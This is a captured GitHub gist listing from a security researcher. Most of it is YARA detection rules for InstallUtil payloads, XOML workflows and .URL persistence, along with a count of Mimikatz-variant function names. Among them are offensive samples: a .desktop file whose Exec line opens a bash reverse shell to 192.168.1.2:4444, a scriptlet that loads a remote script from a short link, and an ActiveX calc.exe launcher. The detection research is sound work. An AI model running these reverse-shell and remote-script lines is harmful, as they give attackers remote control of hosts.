Skip to content

Instantly share code, notes, and snippets.

View itsreallynick's full-sized avatar
🏠
Working from home

Nick Carr itsreallynick

🏠
Working from home
View GitHub Profile
@itsreallynick
itsreallynick / poké.txt
Created September 10, 2020 02:16
Pokémon Challenge - Regex Capture Them All!
Bulbasaur
Ivysaur
Venusaur
Charmander
Charmeleon
Charizard
Squirtle
Wartortle
Blastoise
Caterpie
@itsreallynick
itsreallynick / installutilpayload.yar
Last active November 19, 2019 18:09
Making this rule public
rule Hunting_InstallUtil_ProbablePayload
{
meta:
author = "Nick Carr - @itsreallynick"
description = "2019-05-22 - Focusing on the underlying structure that largely cannot change outside of obfuscation"
strings:
$installutil = "System.Configuration.Install" nocase ascii wide
$override_func1 = "public override string HelpText" nocase ascii wide
$override_func2 = "public override void Uninstall" nocase ascii wide
$override_func3 = "public override void Install" nocase ascii wide
[Desktop Entry]
Name=GoShortcutItsYourEpoch
Exec=/bin/bash -i >& /dev/tcp/192.168.1.2/4444 0>&1
Icon=http://bit.ly/icon-png
Terminal=false
Type=Application
@itsreallynick
itsreallynick / dailyworkflow.yar
Created October 24, 2019 14:39
Workflow.Compiler rules from August 2018
// Background:
rule Hunting_Workflow_Collection_XOML {
meta:
author = "Nick Carr - @itsreallynick"
strings:
$workflow1 = "<SequentialWorkflowActivity" nocase ascii wide
$workflow2 = "Code" nocase ascii wide
condition:
uint16(0) != 0x5A4D and all of ($workflow*) and new_file
@itsreallynick
itsreallynick / gen_URLpersistence.yar
Last active March 10, 2020 12:47
Yara rules for .url tricks that didn't fit in a tweet
rule Methodology_Suspicious_Shortcut_Local_URL
{
meta:
author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)"
description = "Detects local script usage for .URL persistence"
reference = "https://twitter.com/cglyer/status/1176184798248919044"
strings:
$file = "URL=file:///" nocase
$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
$url_explicit = "[InternetShortcut]" nocase
143 function Invoke-Mimidogz
140 function Invoke-Mimikatz
29 function Invoke-Mimi
10 function Chokorun
7 function Invoke-Ttest
7 function Invoke-Mimiwormz
7 function Invoke-Me
6 function Invoke-Mimiturtle
6 function Invoke-Mimimi
5 function output

Keybase proof

I hereby claim:

  • I am itsreallynick on github.
  • I am itsreallynick (https://keybase.io/itsreallynick) on keybase.
  • I have a public key ASDBI4S7vhTSnA-yeUaMckHjZTAVTcOo8qpkRA1h9UCz_wo

To claim this, I am signing this object:

<component><script src="http://goo.gl/fxtJVt"></script></component>
var itsreallycalc = new ActiveXObject("WScript.Shell").Run("calc.exe");
@itsreallynick
itsreallynick / help_Elm0d.yara
Last active August 30, 2017 03:07
Elm0d the Researcher
rule help_Elm0d
{
meta:
author = "@ItsReallyNick - Nick Carr"
description = "We are STILL helping https://twitter.com/Elm0D find his files"
reference = "https://twitter.com/ItsReallyNick/status/902702954272223232"
strings:
$elm0d = /[^a-z0-9]elm0d[^a-z0-9]/ nocase ascii wide
$lol_infra = "iso9001-certificare.ro" nocase ascii wide
$lol_website = "www.elm0d.tk" nocase ascii wide